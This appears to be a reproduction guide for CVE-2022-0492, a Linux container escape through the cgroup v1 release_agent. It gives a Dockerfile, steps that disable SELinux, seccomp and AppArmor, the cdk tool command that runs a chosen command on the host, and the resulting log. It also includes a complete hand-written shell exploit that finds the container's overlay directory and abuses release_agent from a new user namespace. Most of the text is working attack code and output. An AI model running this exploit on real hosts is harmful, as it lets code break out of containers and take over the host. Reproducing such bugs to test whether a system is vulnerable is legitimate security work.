CentOS CVE-2022-0492 vulnerability reproduction (simple version)


1. Download the latest cdk release: https://github.com/cdk-team/CDK/releases

2. Build the image. Dockerfile:

FROM ubuntu:20.04
LABEL MAINTAINER kmahyyg<16604643+kmahyyg@users.noreply.github.com>

# Docker replaces /etc/resolv.conf for every build step, so this line has no
# effect on build-time DNS; it is kept as in the original recipe.
RUN echo "nameserver 223.5.5.5" > /etc/resolv.conf
# Switch to the Aliyun mirror, then install the tools used for poking around
# inside the container (libcap2-bin provides capsh/getpcaps).
RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list && \
    apt update -y && \
    apt install -y ca-certificates wget curl nano strace ltrace socat libcap2-bin && \
    rm -rf /var/cache/apt

# Keep the container alive so it can be entered with docker exec.
CMD ["/bin/bash", "-c", "sleep 9999"]

docker build -t rinchat/test:CVE-2022-0492 . 

The image has also been pushed to the registry as rinchat/test:CVE-2022-0492; a docker pull is enough.

3. Temporarily disable SELinux:

setenforce 0

Enable user namespaces (the exploit creates a new user namespace; on the stock CentOS 7 kernel user.max_user_namespaces defaults to 0, which disables them):

echo user.max_user_namespaces=15000 > /etc/sysctl.d/90-max_net_namespaces.conf
sysctl -p /etc/sysctl.d/90-max_net_namespaces.conf

The cdk binary from step 1 is in the current directory (chmod +x cdk).

4. Start the container with seccomp and AppArmor disabled (Docker's default seccomp profile denies creating a user namespace with unshare/clone unless the process has CAP_SYS_ADMIN, which the exploit relies on), mounting the current directory so cdk is reachable as /test/cdk:

docker run -d -v `pwd`:/test --security-opt "seccomp=unconfined" --security-opt "apparmor=unconfined" --name test rinchat/test:CVE-2022-0492

 

Enter the container with docker exec -it test /bin/bash and run from /test:

./cdk run abuse-unpriv-userns "touch /root/hacked"

Then check on the host whether the file /root/hacked exists. If it does, the host is vulnerable: a command issued inside the container was executed on the host.

Log output when the host is vulnerable:

root@2de2c952ccf1:/test# ./cdk run abuse-unpriv-userns "touch /root/hacked"
2022/04/07 15:27:31 User-Defined Shell Payload: touch /root/hacked
2022/04/07 15:27:31 current cgroup for exploit: rdma
2022/04/07 15:27:31 user-defined shell payload is: touch /root/hacked
2022/04/07 15:27:31 Found hostpath: /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper
2022/04/07 15:27:31 generate shell exploit with user-input cmd:

touch /root/hacked

final shell exploit is:

#!/bin/sh
touch /root/hacked > /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper/cdk_cgres_XCXT

2022/04/07 15:27:31 shell script saved to /cdk_cgexp_XCXT.sh
2022/04/07 15:27:36 Execute Result:
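The steps the cdk log prints (pick the rdma cgroup, find the host path of the container's overlay upper dir, drop a script there, point release_agent at it) can be done by hand. The script below is an added example written for this page in POSIX sh; it is not cdk's code and not from the original post. It assumes a container running as root with seccomp and AppArmor unconfined as in the docker run line above, an overlay/overlay2 storage driver, and the cgroup v1 rdma controller present and not already mounted; the names /exp_<pid>.sh, /cgres_out and /tmp/cg are arbitrary choices made here.

```shell
#!/bin/sh
# Manual reproduction of the cgroup v1 release_agent technique shown in the
# cdk log (rdma controller, overlay upper dir, host-side script). Added
# example, not part of cdk or the original post. Run as root inside a
# container started with seccomp/AppArmor unconfined. The file paths read
# by the helpers are parameters so they can be checked offline.

# Does this kernel expose the cgroup v1 rdma controller? (added in 4.11)
# $1: path of a /proc/cgroups-style file; columns: name hierarchy num enabled
has_rdma_cgroup() {
    awk '$1 == "rdma" && $4 == 1 { found = 1 } END { exit !found }' "${1:-/proc/cgroups}"
}

# Print the upperdir= option of the overlay mount at "/", i.e. the host path
# of the container's writable layer. A file created at /x inside the container
# is <upperdir>/x on the host, which is what lets the host run our script.
# $1: path of a /proc/mounts-style file
overlay_upperdir() {
    awk '$2 == "/" && $3 == "overlay" {
        n = split($4, o, ",")
        for (i = 1; i <= n; i++)
            if (index(o[i], "upperdir=") == 1) { print substr(o[i], 10); exit }
    }' "${1:-/proc/mounts}"
}

# Generate the script the host will run as release_agent. Its output goes into
# the container upper dir so it can be read back from inside the container.
# $1: host upperdir, $2: command to run on the host
release_agent_script() {
    printf '#!/bin/sh\n%s > %s/cgres_out\n' "$2" "$1"
}

# Run $1 on the host. Needs a vulnerable kernel (release_agent writable from a
# non-initial user namespace) and user namespaces enabled on the host.
exploit_release_agent() {
    has_rdma_cgroup || { echo "no rdma cgroup controller" >&2; return 1; }
    upper="$(overlay_upperdir)"
    [ -n "$upper" ] || { echo "root is not an overlay mount" >&2; return 1; }
    script="/exp_$$.sh"                      # container path; $upper$script on the host
    release_agent_script "$upper" "$1" > "$script"
    chmod +x "$script"
    # New user ns (root mapped), mount ns and cgroup ns. Inside them we own the
    # cgroupfs mount, and the vulnerable kernel lets us set release_agent
    # without CAP_SYS_ADMIN in the initial user namespace.
    RELEASE_AGENT="$upper$script" unshare -UrmC sh -c '
        set -e
        mkdir -p /tmp/cg && mount -t cgroup -o rdma cgroup /tmp/cg
        mkdir -p /tmp/cg/x
        echo 1 > /tmp/cg/x/notify_on_release
        echo "$RELEASE_AGENT" > /tmp/cg/release_agent
        # Put a short-lived process into the child cgroup; when it exits the
        # cgroup empties and the kernel runs release_agent in host context.
        sh -c "echo \$\$ > /tmp/cg/x/cgroup.procs"
    '
    sleep 1
    cat /cgres_out 2>/dev/null
}

# Usage inside the container: sh exploit.sh "touch /root/hacked"
if [ $# -gt 0 ]; then
    exploit_release_agent "$1"
fi
```

has_rdma_cgroup and overlay_upperdir take an optional file argument, so they can be run against a saved /proc/cgroups or /proc/mounts without touching a live kernel. On a kernel with the fix, the write to release_agent from the non-initial user namespace fails with EPERM, the set -e inside unshare aborts, and nothing runs on the host.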

 

In testing, the bug was reproducible on kernels newer than 4.11 (note that cdk's abuse-unpriv-userns mounts the rdma cgroup controller, as the log above shows, and that controller only exists from Linux 4.11 on).

Kernel RPMs used for testing (elrepo, el7): http://193.49.22.109/elrepo/kernel/el7/x86_64/RPMS/

Docker version used:

[root@localhost ~]# docker version
Client: Docker Engine - Community
Version: 20.10.0
API version: 1.41
Go version: go1.13.15
Git commit: 7287ab3
Built: Tue Dec 8 18:54:00 2020
OS/Arch: linux/amd64
Context: default
Experimental: true

Server: Docker Engine - Community
Engine:
Version: 20.10.0
API version: 1.41 (minimum version 1.12)
Go version: go1.13.15
Git commit: eeddea2
Built: Tue Dec 8 18:58:04 2020
OS/Arch: linux/amd64
Experimental: false
containerd:
Version: v1.4.3
GitCommit: 269548fa27e0089a8b8278fc4fc781d7f65a939b
runc:
Version: 1.0.0-rc92
GitCommit: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
docker-init:
Version: 0.19.0
GitCommit: de40ad0
